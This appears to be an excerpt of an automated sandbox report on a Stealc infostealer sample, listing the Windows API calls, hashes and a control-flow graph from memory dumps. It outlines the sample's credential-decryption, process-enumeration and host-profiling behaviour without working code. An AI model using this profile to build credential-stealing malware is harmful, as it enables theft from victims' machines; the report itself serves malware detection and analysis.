                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                                                                                                            • String ID: \*.*$w
                                                                                                                                                                            • API String ID: 433455689-886519441
                                                                                                                                                                            • Opcode ID: 9794b4226ab34e66b74375e73d90def39c58eeb217b828d3063d341078fd551e
                                                                                                                                                                            • Instruction ID: 4e05a0a8f80998c5c174bc6f0880eef7f9212315fc2df2e11ff1c0d6408ddeca
                                                                                                                                                                            • Opcode Fuzzy Hash: 9794b4226ab34e66b74375e73d90def39c58eeb217b828d3063d341078fd551e
                                                                                                                                                                            • Instruction Fuzzy Hash: 6F122471950118EAEF15FB60DC9AEED7378AF54300F4045EAB50A66091EF3C6F49CBA2
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,007905AF), ref: 00787BE1
                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00787BF9
                                                                                                                                                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00787C0D
                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00787C62
                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00787D22
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                            • String ID: /
                                                                                                                                                                            • API String ID: 3090951853-4001269591
                                                                                                                                                                            • Opcode ID: a9a7f4ef45931579696c513c56dfc47e54032c71c67b35b7f19c0caee528a284
                                                                                                                                                                            • Instruction ID: 259be32d6398411311b35125ad8f3a70875c309a511d080169474ccfd6f77d13
                                                                                                                                                                            • Opcode Fuzzy Hash: a9a7f4ef45931579696c513c56dfc47e54032c71c67b35b7f19c0caee528a284
                                                                                                                                                                            • Instruction Fuzzy Hash: 1F413E71994218EBDB24EB94DC99BEDB3B8FF44700F2041D9E40A62191DB786F85CFA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0078961E
                                                                                                                                                                            • Process32First.KERNEL32(00790ACA,00000128), ref: 00789632
                                                                                                                                                                            • Process32Next.KERNEL32(00790ACA,00000128), ref: 00789647
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0078965C
                                                                                                                                                                            • CloseHandle.KERNEL32(00790ACA), ref: 0078967A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                            • Opcode ID: 53940d8ae11d41f14b60c4e4c3e094ed2e5a3b3682cc9de9ee6d23a35ce3f5d5
                                                                                                                                                                            • Instruction ID: 5c38e5bc9e7e10190fc91864212762dbc101d3cde4a9d5d081164704c82edc2a
                                                                                                                                                                            • Opcode Fuzzy Hash: 53940d8ae11d41f14b60c4e4c3e094ed2e5a3b3682cc9de9ee6d23a35ce3f5d5
                                                                                                                                                                            • Instruction Fuzzy Hash: 63011E75A54208EBCB14DFA5DD98BEDB7F8EF48710F144288AA05A7250EB34DB40DF51
                                                                                                                                                                            APIs
                                                                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00779B84
                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00779BA3
                                                                                                                                                                            • memcpy.MSVCRT(?,?,?), ref: 00779BC6
                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 00779BD3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3243516280-0
                                                                                                                                                                            • Opcode ID: 15c6d6c518aa2d79fdad30c4c2476993fd93c16856e5cc6d729395555cceb05d
                                                                                                                                                                            • Instruction ID: c5ffd872a3681835e2d108dd727ce078f5a7aa8f3baebe7a2ff1830b7d8e5c31
                                                                                                                                                                            • Opcode Fuzzy Hash: 15c6d6c518aa2d79fdad30c4c2476993fd93c16856e5cc6d729395555cceb05d
                                                                                                                                                                            • Instruction Fuzzy Hash: 1911BAB4A00209EFDB04DF94D985AAE77B5FF89300F104558E91997350D774AE50CF61
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00CFF9C0,00000000,?,00790E10,00000000,?,00000000,00000000), ref: 00787A63
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00CFF9C0,00000000,?,00790E10,00000000,?,00000000,00000000,?), ref: 00787A6A
                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00CFF9C0,00000000,?,00790E10,00000000,?,00000000,00000000,?), ref: 00787A7D
                                                                                                                                                                            • wsprintfA.USER32 ref: 00787AB7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 362916592-0
                                                                                                                                                                            • Opcode ID: 930067d7e8fa68b6bf1f08dd4d5752c6509a664d89c5d4b1c42672f31cc8fb70
                                                                                                                                                                            • Instruction ID: 8fcb13037342cad458f44071bb0b39ea60865adefd4048dba3a17ecc1011addd
                                                                                                                                                                            • Opcode Fuzzy Hash: 930067d7e8fa68b6bf1f08dd4d5752c6509a664d89c5d4b1c42672f31cc8fb70
                                                                                                                                                                            • Instruction Fuzzy Hash: 371182B1949218EBDB249B54DD45F69B778FB04721F104399E51A932C0D7785E40CF91
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007711B7), ref: 00787880
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,007711B7), ref: 00787887
                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0078789F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1206570057-0
                                                                                                                                                                            • Opcode ID: 390416d5d46b3593fbd1ec61dcc8c1297b6700ab76227f150ac09c4c0461c824
                                                                                                                                                                            • Instruction ID: 89efc5a98e11ee594976f55ba1c12e4d24b23541116fcdabb367836c847b800b
                                                                                                                                                                            • Opcode Fuzzy Hash: 390416d5d46b3593fbd1ec61dcc8c1297b6700ab76227f150ac09c4c0461c824
                                                                                                                                                                            • Instruction Fuzzy Hash: 71F04FF1D48208ABC714DF98DD49FAEBBB8EB04721F10025AFA05A2680C7785904CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00786A17,00790AEF), ref: 0077116A
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0077117E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExitInfoProcessSystem
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 752954902-0
                                                                                                                                                                            • Opcode ID: bfcc879a47b77985f320f3e082994a6f445e15bd83ebb110e97a015ef71b636f
                                                                                                                                                                            • Instruction ID: 994f3756345d7b79028f574be4479b1113f2ac12d4dfa9649f72769ede72e0c2
                                                                                                                                                                            • Opcode Fuzzy Hash: bfcc879a47b77985f320f3e082994a6f445e15bd83ebb110e97a015ef71b636f
                                                                                                                                                                            • Instruction Fuzzy Hash: D0D05E74D0830CDBCB00DFE0D9896DDBBB8FB08321F4006A4D90562340EA315881CBA6

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 633 789c10-789c1a 634 789c20-78a031 GetProcAddress * 43 633->634 635 78a036-78a0ca LoadLibraryA * 8 633->635 634->635 636 78a0cc-78a141 GetProcAddress * 5 635->636 637 78a146-78a14d 635->637 636->637 638 78a153-78a211 GetProcAddress * 8 637->638 639 78a216-78a21d 637->639 638->639 640 78a298-78a29f 639->640 641 78a21f-78a293 GetProcAddress * 5 639->641 642 78a2a5-78a332 GetProcAddress * 6 640->642 643 78a337-78a33e 640->643 641->640 642->643 644 78a41f-78a426 643->644 645 78a344-78a41a GetProcAddress * 9 643->645 646 78a428-78a49d GetProcAddress * 5 644->646 647 78a4a2-78a4a9 644->647 645->644 646->647 648 78a4ab-78a4d7 GetProcAddress * 2 647->648 649 78a4dc-78a4e3 647->649 648->649 650 78a515-78a51c 649->650 651 78a4e5-78a510 GetProcAddress * 2 649->651 652 78a612-78a619 650->652 653 78a522-78a60d GetProcAddress * 10 650->653 651->650 654 78a61b-78a678 GetProcAddress * 4 652->654 655 78a67d-78a684 652->655 653->652 654->655 656 78a69e-78a6a5 655->656 657 78a686-78a699 GetProcAddress 655->657 658 78a708-78a709 656->658 659 78a6a7-78a703 GetProcAddress * 4 656->659 657->656 659->658
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFBC08), ref: 00789C2D
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFBB08), ref: 00789C45
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1FA8), ref: 00789C5E
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1FC0), ref: 00789C76
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1FF0), ref: 00789C8E
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF2068), ref: 00789CA7
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFA770), ref: 00789CBF
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF2080), ref: 00789CD7
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF2128), ref: 00789CF0
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF2230), ref: 00789D08
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF2188), ref: 00789D20
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFB9E8), ref: 00789D39
